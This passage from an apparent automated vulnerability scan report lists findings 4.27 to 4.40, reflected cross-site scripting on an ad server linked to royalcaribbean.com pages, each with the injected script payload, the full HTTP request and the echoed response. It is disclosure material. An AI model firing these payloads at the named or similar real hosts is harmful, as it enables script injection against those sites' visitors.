User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/beforeyouboard/home.do?cS=NAVBAR
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 361
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/beforeyouboard/home.do71986"><script>alert(1)</script>39fbfdcbd35/1057094292/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.27. http://b3.mookie1.com/2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69e7f"><script>alert(1)</script>3b5492b8b5f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x9569e7f"><script>alert(1)</script>3b5492b8b5f?cS=NAVBAR&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/beforeyouboard/home.do?cS=NAVBAR
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 353
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/beforeyouboard/home.do/1755156653/x9569e7f"><script>alert(1)</script>3b5492b8b5f/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.28. http://b3.mookie1.com/2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bda1"><script>alert(1)</script>bf5c31379dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com8bda1"><script>alert(1)</script>bf5c31379dc/dealsandmore/hotdeals.do/0246060285@x95?cS=NAVBAR&pnav=3&snav=1&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/dealsandmore/hotdeals.do?cS=NAVBAR&pnav=3&snav=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:30 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 361
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com8bda1"><script>alert(1)</script>bf5c31379dc/dealsandmore/hotdeals.do/28155463/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.29. http://b3.mookie1.com/2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e00b5"><script>alert(1)</script>16045c277b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/dealsandmoree00b5"><script>alert(1)</script>16045c277b7/hotdeals.do/0246060285@x95?cS=NAVBAR&pnav=3&snav=1&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/dealsandmore/hotdeals.do?cS=NAVBAR&pnav=3&snav=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 362
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/dealsandmoree00b5"><script>alert(1)</script>16045c277b7/hotdeals.do/997504606/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.30. http://b3.mookie1.com/2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ccd9"><script>alert(1)</script>28b9d527268 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/dealsandmore/hotdeals.do5ccd9"><script>alert(1)</script>28b9d527268/0246060285@x95?cS=NAVBAR&pnav=3&snav=1&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/dealsandmore/hotdeals.do?cS=NAVBAR&pnav=3&snav=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 363
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/dealsandmore/hotdeals.do5ccd9"><script>alert(1)</script>28b9d527268/1534640086/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.31. http://b3.mookie1.com/2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41da4"><script>alert(1)</script>22e0f1b1f7c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x9541da4"><script>alert(1)</script>22e0f1b1f7c?cS=NAVBAR&pnav=3&snav=1&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/dealsandmore/hotdeals.do?cS=NAVBAR&pnav=3&snav=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 353
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/dealsandmore/hotdeals.do/36049341/x9541da4"><script>alert(1)</script>22e0f1b1f7c/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.32. http://b3.mookie1.com/2/royalcaribbean.com/home.do/6905219797@x95 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/home.do/6905219797@x95

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92afc"><script>alert(1)</script>b2d568f1b6d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com92afc"><script>alert(1)</script>b2d568f1b6d/home.do/6905219797@x95?_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com92afc"><script>alert(1)</script>b2d568f1b6d/home.do/1432671807/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.33. http://b3.mookie1.com/2/royalcaribbean.com/home.do/6905219797@x95 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/home.do/6905219797@x95

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c259b"><script>alert(1)</script>3e94a41bd6e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/home.doc259b"><script>alert(1)</script>3e94a41bd6e/6905219797@x95?_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:29 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/home.doc259b"><script>alert(1)</script>3e94a41bd6e/204585521/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.34. http://b3.mookie1.com/2/royalcaribbean.com/home.do/6905219797@x95 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/home.do/6905219797@x95

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 839c5"><script>alert(1)</script>e2b99c27f67 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/home.do/6905219797@x95839c5"><script>alert(1)</script>e2b99c27f67?_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 337
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/home.do/649712140/x95839c5"><script>alert(1)</script>e2b99c27f67/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.35. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/4350521243@x95 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/search/processSearch.do/4350521243@x95

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b56e"><script>alert(1)</script>ba72abc70b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com2b56e"><script>alert(1)</script>ba72abc70b1/search/processSearch.do/4350521243@x95?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:43:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 362
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com2b56e"><script>alert(1)</script>ba72abc70b1/search/processSearch.do/1470161541/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.36. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/4350521243@x95 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/search/processSearch.do/4350521243@x95

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7f1a"><script>alert(1)</script>66ffec0be48 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/searchd7f1a"><script>alert(1)</script>66ffec0be48/processSearch.do/4350521243@x95?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:43:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 362
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/searchd7f1a"><script>alert(1)</script>66ffec0be48/processSearch.do/1132808216/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.37. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/4350521243@x95 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/search/processSearch.do/4350521243@x95

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7cfc"><script>alert(1)</script>0b79b388d6e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/search/processSearch.dof7cfc"><script>alert(1)</script>0b79b388d6e/4350521243@x95?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:43:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 361
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/search/processSearch.dof7cfc"><script>alert(1)</script>0b79b388d6e/786852054/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.38. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/4350521243@x95 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/search/processSearch.do/4350521243@x95

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da89e"><script>alert(1)</script>5102141a7e2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/search/processSearch.do/4350521243@x95da89e"><script>alert(1)</script>5102141a7e2?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:43:20 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 354
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/search/processSearch.do/1003494811/x95da89e"><script>alert(1)</script>5102141a7e2/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.39. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/9110333970@x95 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/search/processSearch.do/9110333970@x95

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15a5e"><script>alert(1)</script>5afac9b96c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com15a5e"><script>alert(1)</script>5afac9b96c6/search/processSearch.do/9110333970@x95?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 362
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com15a5e"><script>alert(1)</script>5afac9b96c6/search/processSearch.do/1690492633/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.40. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/9110333970@x95 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/search/processSearch.do/9110333970@x95

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7734c"><script>alert(1)</script>d1c057d37d7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/search7734c"><script>alert(1)</script>d1c057d37d7/processSearch.do/9110333970@x95?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 362
Content-Type: text/html

